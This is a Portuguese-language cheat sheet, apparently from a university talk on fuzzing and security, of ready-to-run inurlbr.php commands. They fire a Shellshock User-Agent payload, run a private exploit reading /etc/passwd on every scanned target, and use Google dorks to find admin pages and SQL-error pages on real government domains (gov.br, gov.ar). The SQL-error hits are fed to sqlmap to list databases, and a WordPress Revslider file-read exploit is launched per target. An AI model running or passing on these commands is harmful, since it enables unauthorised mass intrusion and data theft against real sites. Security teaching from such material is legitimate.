[COMANDOS] APRESENTAÇÃO/ Fuzzing e segurança - UNINOVE

1. [+] Shellshock:
2. set user-agent exploit;
3. '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"'
4.  
5. - EXECUÇÃO + VALIDAÇÃO INTERNA:
6. php inurlbr.php -o SHELLSHOCK_vull.txt -s vull.txt --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"' -t 2 -a 99887766555
7.  
8.  
9. - EXECUÇÃO + XPL PRIV8:
10. php inurlbr.php -o testarSHELLSHOCK.txt -s teste.txt --command-all 'php shellshock.php -t "_TARGETFULL_" -c "cat /etc/passwd"'
11.  
12.  
13. [+] FIND PAGE:
14. DORK: inurl:"/admin/index.php"
15. php inurlbr.php --target 'www.geovisite.com' -s testes.txt -o url-list/adminpage.inurl -t 5
16.  
17. [+] SCAN ERROS SQLI
18. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
19. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27"
20.  
21.  
22. [+] SCAN ERROS SQLI + sqlmap
23. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
24. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27" --command-all '../../sqlmap/./sqlmap.py -u "_TARGETFULL_" --dbs --proxy "http://localhost:8118"'
25.  
26.  
27. [+] SCAN VULNS CMS WORDPRESS
28. DORK: inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
29. php inurlbr.php --dork 'inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s teste.txt --command-all 'php exploitWPLFD.php _TARGET_'